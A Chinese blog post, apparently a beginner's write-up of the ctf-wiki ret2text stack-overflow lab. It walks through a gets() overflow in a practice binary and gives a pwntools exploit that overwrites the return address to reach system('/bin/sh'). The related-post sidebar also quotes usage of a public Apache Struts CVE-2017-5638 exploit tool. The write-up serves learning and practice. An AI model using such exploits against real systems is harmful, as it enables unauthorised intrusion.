pwn基础之ctfwiki-栈溢出-基本ROP-ret2text

最新推荐文章于 2024-07-24 10:35:36 发布
最新推荐文章于 2024-07-24 10:35:36 发布
阅读量996 收藏 5
点赞数 5
分类专栏: 笔记 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_52658640/article/details/115976645
版权

文章目录

前言

刚开始自己的二进制生涯,想记录一下自己的学习,如有错误还请大佬们斧正。

原理

ret2text 即控制程序执行程序本身已有的的代码 (.text)。其实,这种攻击方法是一种笼统的描述。我们控制执行程序已有的代码的时候也可以控制程序执行好几段不相邻的程序已有的代码 (也就是 gadgets),这就是我们所要说的 ROP。

这时,我们需要知道对应返回的代码的位置。当然程序也可能会开启某些保护,我们需要想办法去绕过这些保护。

ret2text

发现漏洞

通过ubuntu下的checksec命令去检查文件的类型和保护状况。
在这里插入图片描述
发现文件为32位,开启了NX(堆栈不可执行)保护。
那么我们就用ida去分析这个文件。

main函数代码如下

int __cdecl main(int argc, const char **argv, const char **envp)
{
  char s; // [esp+1Ch] [ebp-64h]

  setvbuf(stdout, 0, 2, 0);
  setvbuf(_bss_start, 0, 1, 0);
  puts("There is something amazing here, do you know anything?");
  gets(&s);
  printf("Maybe I will tell you next time !");
  return 0;
}

发现到危险函数gets(),gets函数只会接受输入,但不会对输入的函数进行长度上的限制,这就形成了栈溢出漏洞。

利用漏洞

我们在看一下文件的secure函数,代码如下

void secure()
{
  unsigned int v0; // eax
  int input; // [esp+18h] [ebp-10h]
  int secretcode; // [esp+1Ch] [ebp-Ch]

  v0 = time(0);
  srand(v0);
  secretcode = rand();
  __isoc99_scanf((const char *)&unk_8048760, &input);
  if ( input == secretcode )
    system("/bin/sh");
}

存在一个函数system("/bin/sh");
执行这个语句会返回一个shell给我们,那么我们的利用思路来了!只需要将栈填满,然后覆盖返回地址为system("/bin/sh");的地址。
在这里插入图片描述
查看汇编会发现system("/bin/sh")的地址为0804863A
再查看栈内需要覆盖的长度就可以利用漏洞得到靶机的shell了。
在这里插入图片描述
在这里插入图片描述
查看s需要的长度为0x64,那么若需要覆盖返回地址则需要填充0x68长度的空间,知道了这些信息我们就可以写利用脚本了。

书写exp

from pwn import *

sh = process('./ret2text')                 #执行获得的文件
target = 0x804863A                         #system("/bin/sh")的地址
payload = 'A' * (0x68) + p32(target)       #构造payload
sh.sendline(payload)                       #上传payload
sh.interactive()                           #打开交互

总结

这只是我学习pwn的第一步,还望大佬斧正。

参考自:https://ctf-wiki.org/pwn/linux/stackoverflow/basic-rop/

大能猫能
关注
  • 5
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 3
    评论
专栏目录
Linux pwn入门教程(1)——溢出基础-0x01.rar
06-10
Linux pwn入门教程(1)——溢出基础
struts-pwn:Apache Struts CVE-2017-5638的漏洞利用
05-18
python struts-pwn.py --list 'urls.txt' -c 'id' 检查针对单个URL的漏洞是否存在。 python struts-pwn.py --check --url 'http://example.com/struts2-showcase/index.action' 根据URL列表检查漏洞是否存在。 ...
pwn基础ctfwiki-溢出-基础ROP-ret2shellcode
qq_52658640的博客
04-22 1187
文章目录前言原理ret2shellcode挖掘漏洞利用漏洞利用脚本(exp)总结 前言 二进制小白的学习记录,是自己写的第二篇文章,相较于第一篇文章我也做了一些改进,希望会越来越好。也希望二进制大佬们及时斧正文章的错误。 原理 ret2shellcode,即控制程序执行 shellcode 代码。shellcode 指的是用于完成某个功能的汇编代码,常见的功能主要是获取目标系统的 shell。一般来说,shellcode 需要我们自己填充。这其实是另外一种典型的利用方法,即此时我们需要自己去填充一些可执
探索黑客的智慧宝库:PwnWiki.io
gitblog_00005的博客
05-10 254
探索黑客的智慧宝库:PwnWiki.io 项目地址:https://gitcode.com/pwnwiki/pwnwiki.github.io 1、项目介绍 PwnWiki.io,一个渗透测试者和红队队员的知识海洋,是您在攻破目标系统后进一步行动的指南。这个开源项目不仅仅是一个在线资源集合,更是一个可离线使用的本地化百科全书,致力于提供工具、策略和程序(TTPs)的全面指导。 2、项目技术分析 P...
pwn基础ctfwiki-溢出-基础ROP-ret2syscall
qq_52658640的博客
04-22 1412
文章目录前言原理系统调用ret2system挖掘漏洞2.读入数据总结 前言 二进制小白的学习笔记,如有错误请大佬及时斧正。 原理 ret2syscall,即控制程序执行系统调用,获取 shell。 系统调用 Linux 的系统调用通过 int 80h 实现,用系统调用号来区分入口函数。操作系统实现系统调用的基本过程是: 应用程序调用库函数(API); API 将系统调用号存入 EAX,然后通过中断调用使系统进入内核态; 内核中的中断处理函数根据系统调用号,调用对应的内核函数(系统调用); 系统调用完成相应
pwn基础ctfwiki-溢出-基础ROP-ret2libc-3
qq_52658640的博客
04-23 1172
文章目录基础知识libc泄露原理利用方法ret2libc3挖掘漏洞利用漏洞利用脚本 基础知识 libc泄露 原理 当有一道题给了可执行文件文件,在ida分析中并不能找到system函数和binsh地址,这时我们就可以利用在溢出之前执行过的函数泄露libc的版本。因为libc函数相对于libc的基地址都是确定的,采用 got 表泄露,即输出某个函数对应的 got 表项的内容,所以就可以通过上述方法来获取libc函数中的system地址和字符binsh的地址。 system 函数属于 libc,而 libc
CTF-PWN-溢出-基本ROP-【ret2syscall】
llovewuzhengzi的博客
11-21 276
发现这里有个move %rbp %rsp,那么如果之前存储的rbp合适的话,那么可以继续ROP,rbp应该为在syscall调用前的前十六个字节,因为还要有pop rbp和pop rbx得抵消掉。64位的系统调用号放在rax 传参依次是 RDI、RSI、RDX、R10、R8、R9 (和64位函数传参一样)如果发现start和end相同时,重写输入,否则返回输入的数据所在数组的一个start位置所在的字节。32的系统调用号与64位的不大一样 使用的时候最好百度一下。这里的sys_read存在很明显的溢出
CTF-PWN-溢出-基本ROP-【ret2shellcode】
llovewuzhengzi的博客
11-16 134
C 库函数 int atoi(const char *str) 把参数 str 所指向的字符串转换为一个整数(类型为 int 型)。溢出,同时上可执行,利用泄露的buf地址作为返回地址,同时将shellcode写入buf。这里read存在溢出,同时第一个fprintf输出了buf的地址。Has RWX segments提示有可读可写可执行的段。接受字节‘0x ……’的处理,先化整型然后p64处理。shellcode一个不行就换下一个。控制程序去执行我们自己填充的代码。
CTF-PWN-溢出-中级ROP-【BROP-2】
llovewuzhengzi的博客
12-26 1150
此时将输出函数puts在got表中的地址作为参数,调用puts函数,从而得到puts的真实地址,进而得到libc基地址。注意此时不要关闭传输通道,不然进程再次重启,对应的puts的真实地址会改变,其libc基地址也会改变,所以此时得到puts函数真实地址后跳转到主函数(返回地址是stop_addr),然后计算得到libc基地址和system地址和/bin/sh的地址,然后再次输入构造的ROP链即getshellput_got_addr=0x601018 # 查看binary_file找到got表的地址。
CTF-PWN-溢出-初级ROP-【ret2libc】
llovewuzhengzi的博客
01-02 1301
当发生信号处理时,会调用func对于的函数。此时注意nptr是输入的内容的起始地址,而&savedregs顾名思义并查看IDA就知道其是上保存着rbp的位置,v7是输入的长度,此时存在溢出,当memcpy后可能使得复制的值到到返回地址。ret2libc即控制程序去执行libc库中的函数,通常是返回至某个函数的 plt 处或者某个函数的具体位置 (即某个函数对应的 got 表项的内容)1.dlopen将指定的动态库以特定的方式装载到当前进程实体,并返回一个可操作的句柄,用以后续获取函数地址等操作;
CTF-PWN-溢出-基本ROP -【re2text
llovewuzhengzi的博客
11-12 57
volatile 关键字是一种类型修饰符,volatile 提醒编译器它后面所定义的变量随时都有可能改变,因此编译后的程序每次需要存储或读取这个变量的时候,都会直接从变量地址中读取数据。随着NX保护开启,往上或堆上直接注入代码无法实现,目前通过ROP(Return Oriented Programming)来绕过保护。如果gadget每次地址不是固定,那么就需要想办法动态获取对应的地址了。可以找到满足的gadgets以及相应的gadget地址。即返回时,程序执行程序本身的代码(.text代码段)
CTF-PWN笔记(一)-- 溢出基础ROP
CK_0ff的博客
01-09 4385
文章目录linux内存布局原理文件保护机制CanaryNXPIE(ASLR)RELRO简单的溢出(ret2txt)ret2shellcode 是一种典型的后进先出 (Last in First Out) 的数据结构,其操作主要有压 (push) 与出 (pop) 两种操作,如下图所示(维基百科)。两种操作都操作顶,当然,它也有底。 高级语言在运行时都会被转换为汇编程序,在汇编程序运行过程中,充分利用了这一数据结构。每个程序在运行时都有虚拟地址空间,其中某一部分就是该程序对应的,用于保存
Wi-PWN_8.0_ENGLISH.bin
08-25
ESP8266的WIFI杀手固件,这是不带显示的。 我后续更新带OLED显示的固件。教程后将更新。
PWN入门之迁移-附件资源
03-02
PWN入门之迁移-附件资源
Wi-PWN_8.0_ENGLISH_OLED.bin
08-25
这是ESP8266的带OLED显示的WIFI杀手固件。
heap exploitation巩固——堆中的off-by-one
qq_52658640的博客
12-06 2716
heap exploitation巩固——堆中的off-by-one (from:大能猫) 0x00 前言 off-by-one是一种堆溢出,从它的名字上来看就知道它只能够溢出一个字节。在之前很长的一段时间off-by-one漏洞被认为是不可利用的,不过这样的观点已经被打破,并且off-by-one也成为了一个危害性比较大的漏洞,就算只溢出了一个字节也可以改变堆快关系来达到利用的目的。 0x01 off-by-one漏洞的原理 off-by-one漏洞顾名思义,就是我们在向缓冲区写入数据的时候由于限制条件或
微软蓝屏事件引发对构建更加稳固和安全的网络环境的思考
最新发布
lupai的博客
07-24 413
综上所述,构建更加稳固和安全的网络环境需要政府、企业和用户共同努力,从政策、技术、用户行为等多个方面入手,形成全方位、多层次的网络安全防护体系。构建更加稳固和安全的网络环境是一个系统工程,需要从多个方面入手,包括政策、技术、用户行为等多个层面。建立完善的应急响应机制,制定应急预案和演练计划,提高应对网络攻击和突发事件的能力。鼓励和支持网络安全技术的研发和创新,推动新技术在网络安全领域的应用和推广。加强对用户的网络安全教育,提高用户的网络安全意识和防范能力。
网络战时代的国家安全:策略、技术和国际合作
2301_79955948的博客
07-24 1053
网络战时代的国家安全涉及到策略、技术和国际合作等多个方面。
ctfshow PWN 溢出
08-23
PWN是一种以攻破计算机系统中的漏洞为目的的竞赛类型,参赛者需要利用漏洞进行攻击并获取系统权限。在ctfshow PWN中,溢出是一种常见的攻击方式。 根据提供的引用,我了解到溢出是一种通过向程序输入过长的数据导致数据溢出的一种攻击手段。是一种数据结构,用于存储程序的局部变量和函数调用的返回地址等信息。当程序接收到超出空间大小的数据时,溢出的数据会覆盖到上的其他数据,从而可能改变程序的执行流程。 根据引用,在ctfshow PWN中,参赛者可以利用溢出漏洞来控制程序的执行流程。通过向程序输入特制的数据,可以覆盖控制流中的返回地址,使程序跳转到攻击者精心构造的代码,从而达到获取系统权限的目的。 具体来说,参赛者可以通过向程序发送超出预期的数据,覆盖上的返回地址,使其指向攻击者准备好的恶意代码,从而实现溢出攻击。攻击者可以利用此漏洞来执行任意代码,包括获取系统权限、执行恶意操作等。 引用和引用提供了一些示例代码,演示了如何利用溢出漏洞进行攻击。这些代码使用Python的pwn库来与目标程序进行交互,并通过构造特制的payload来触发溢出漏洞,最终实现控制程序执行流程的目的。 需要注意的是,溢出是一种非常危险的漏洞,合法的程序设计应该避免出现此类问题。在实际应用中,为了防止溢出攻击,开发者需要加强输入验证和数据处理等安全机制。 总结起来,ctfshow PWN溢出是一种通过向程序输入过长数据导致溢出的攻击方式,在该竞赛中常用于获取系统权限和执行恶意操作。攻击者可以利用漏洞覆盖返回地址,使程序执行恶意代码。然而,溢出是一种危险的漏洞,合法的程序设计应该避免此类问题。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *2* [ctfshow pwn4](https://blog.csdn.net/qq_39980610/article/details/126461902)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] - *3* [ctfshow pwn5](https://blog.csdn.net/qq_39980610/article/details/126462163)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值